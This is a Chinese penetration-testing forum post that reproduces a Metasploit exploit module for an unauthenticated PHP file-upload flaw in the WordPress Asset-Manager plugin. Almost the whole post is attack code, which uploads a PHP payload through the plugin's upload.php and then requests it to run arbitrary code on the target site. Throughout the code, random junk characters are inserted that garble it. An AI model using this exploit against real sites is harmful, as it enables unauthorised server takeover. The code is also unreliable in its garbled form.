找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1990|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。+ Y/ A6 ]7 W' f. V

" t; U2 n& ~& f1 k##
" m* z! _8 F5 D; q" t& N1 T% M0 Y# This file is part of the Metasploit Framework and may be subject to+ m: ?4 @/ I8 ?. Y( V; g7 p" `
# redistribution and commercial restrictions. Please see the Metasploit
% p4 i4 k% @* T7 t/ y2 v' v# Framework web site for more information on licensing and terms of use.
4 \( C  V$ s- J1 A* x4 p#   http://metasploit.com/framework/
! O: s: z$ F* Q3 o##
# U. z/ r# ~/ T) t
: y* M; C2 r' L0 K- Vrequire 'msf/core'  ~- X" E" D( D8 Q0 u6 O" i
require 'msf/core/exploit/php_exe'
* t0 V& t  Y4 Z, Y) A9 t' Q$ D
* `( O8 @/ n0 Y8 xclass Metasploit3 < Msf::Exploit::Remote7 O6 l/ Z# P* Y$ z( o) S
  Rank = ExcellentRanking9 ^: b& ~! e; L( C+ }! a
; E$ T6 ?# N% O+ g' g+ c
  include Msf::Exploit::Remote::HttpClient2 O( l6 J1 V# Q  Y
  include Msf::Exploit:hpEXE
8 F3 m) b1 S" v! Z# L
. y  E2 s7 {5 Q3 ], o  Y  def initialize(info = {})
* p8 e5 c7 }  L8 X: R    super(update_info(info,9 ?, d. v0 o2 r* {0 _7 H
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',' [) o! D9 m, ]9 i% n5 t2 o! r2 E
      'Description'    => %q{1 h: \# @* h8 _- N5 H9 H
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
7 V1 W( N# G7 ~7 {* u        plugin.  By abusing the upload.php file, a malicious user can upload a file to a$ ]8 Z/ {4 e! a
        temp directory without authentication, which results in arbitrary code execution.: Q: o9 Q+ e" G$ L; P0 f6 T  d
      },$ D  @5 P6 k& ]8 ?
      'Author'         =>
  _5 Z0 ~, ~& N: \+ [        [
9 L+ x. g5 z8 d9 ]6 \          'Sammy FORGIT', # initial discovery
' ^2 I- Z3 C% ]; v! m          'James Fitts <fitts.james[at]gmail.com>' # metasploit module" ?0 A& p4 s! y+ [) D' \! r! F
        ],$ Q' A$ H  O, y
      'License'        => MSF_LICENSE,' I0 @% v* x# y3 ]3 U
      'References'     =>' J& x) g2 @" k7 d
        [
! {& u. G* U8 N2 D/ W! F          [ 'OSVDB', '82653' ],
1 t& ]  u/ a) G- K+ j+ b0 ]          [ 'BID', '53809' ],
! l- |$ o) E! W          [ 'EDB', '18993' ],
' b/ ]  d$ D; b! J          [ 'URL', 'http:// www.myhack58.com /' ]7 R; {5 I+ k8 Y* v1 }7 z
        ],
+ [3 K: N6 K# i; j; c      'Payload'       =>
2 D- M0 e1 _% J  g% E: V( I/ b        {
' {; j) e/ u8 u8 `7 t" c          'BadChars' => "\x00",' j# ^9 s" x, w
        },' J% y1 U+ R5 P) Z8 G( B$ j6 v' e0 K
      'Platform'       => 'php',
" Z: V0 w  J( w# f1 C      'Arch'           => ARCH_PHP,* A3 o: y+ f& s/ x8 V. ^9 Q' U4 s6 Q
      'Targets'        =>3 A+ y1 r7 s  P3 ~' r! _; x
        [
: Y: R6 a+ A2 I5 \$ f* E! }% B          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
0 M1 b( m0 b; t$ r. v, c          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]( G8 b8 j* G) g$ H: c0 |
        ],' _  G- ^) q! B1 ~
      'DefaultTarget' => 0,
, c7 e/ b3 V* i$ ?! W% M      'DisclosureDate' => 'May 26 2012'))
3 `  e, r0 H( a1 V8 x6 x ; q6 z' [2 `. X5 \! }2 b
    register_options(8 d7 @0 w0 d& p4 e8 v
      [' J# L: c$ i8 I, X* S' o  R
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
' C5 n9 h: s& @: b$ C1 }      ], self.class)/ u) L5 d0 e9 M* i$ m2 ]
  end
( S. Q: v8 }: `  }3 M& d
" L7 D& G' e) g5 _$ M7 R  def exploit! H$ E* J0 j  i5 n9 @7 ]8 R, F) T/ t( \
    uri =  target_uri.path( J+ a1 {  w1 c- B. Q8 a( @" h
    uri << '/' if uri[-1,1] != '/'  B1 A) N/ e2 U5 h8 F( o4 p& A4 o
    peer = "#{rhost}:#{rport}"1 ]1 O) H8 \5 _2 W- s2 g
    payload_name = "#{rand_text_alpha(5)}.php"
$ T" t% \' V6 J7 H    php_payload = get_write_exec_payload(:unlink_self=>true)3 T/ f& i; X, V% ~  f( O

) |& s' Q1 k. q# ^    data = Rex::MIME::Message.new% E( o  K+ `5 j. E# d) n
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\""). N  t, Z! a7 I6 `' Z* ^! J
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'), M% |+ x. w; e" Q) J, O% L" F: }9 ^6 t, I

+ v' P, M- s: T    print_status("#{peer} - Uploading payload #{payload_name}")$ C4 N- W" i, v& m: z7 q8 T1 }
    res = send_request_cgi({
" b8 k9 N6 I* R  n% N' o      'method'  => 'POST',
* y: v* W$ |: ~9 P+ E- Q      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",* L! ?) o+ D' i  ~2 l! b9 \/ d
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",6 c$ Y5 W" m* `, e
      'data'    => post_data' }* @! |5 x% ~' e& ^) [
    })
1 U: _2 k! Z% x- o: S3 b
$ A8 j1 g- @% t' M8 ^$ u/ q    if not res or res.code != 200 or res.body !~ /#{payload_name}/9 v6 v2 R9 n8 }! R; }6 J/ G5 F
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")1 g/ A6 }  S6 o/ _) T* b+ T
end6 ?* R: N& S1 G7 x
+ o0 R4 n6 N7 u( y0 K" p5 Y
    print_status("#{peer} - Executing payload #{payload_name}")
, n  J$ U: Q4 Y" o( g4 h    res = send_request_raw({
' F9 k! n# a9 T* d" K/ d1 T& e      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",5 _% b4 m1 z; B5 S/ R- u
      'method'  => 'GET'
/ C9 y% x% N3 u& `9 P1 `    })
) e# h% W  G4 O# c" p. K 6 e( p4 Y( a+ @: K# N
    if res and res.code != 200
8 m% W; O* s+ W2 _6 Z      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")% V/ V7 A: ?' e6 T7 G$ P
    end6 y0 i% B7 C+ d( ~/ [8 x7 v
  end+ S! n4 G; ^7 L6 l3 A
end% ]. F# p) d, V( Y3 i  W' J5 h0 d
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表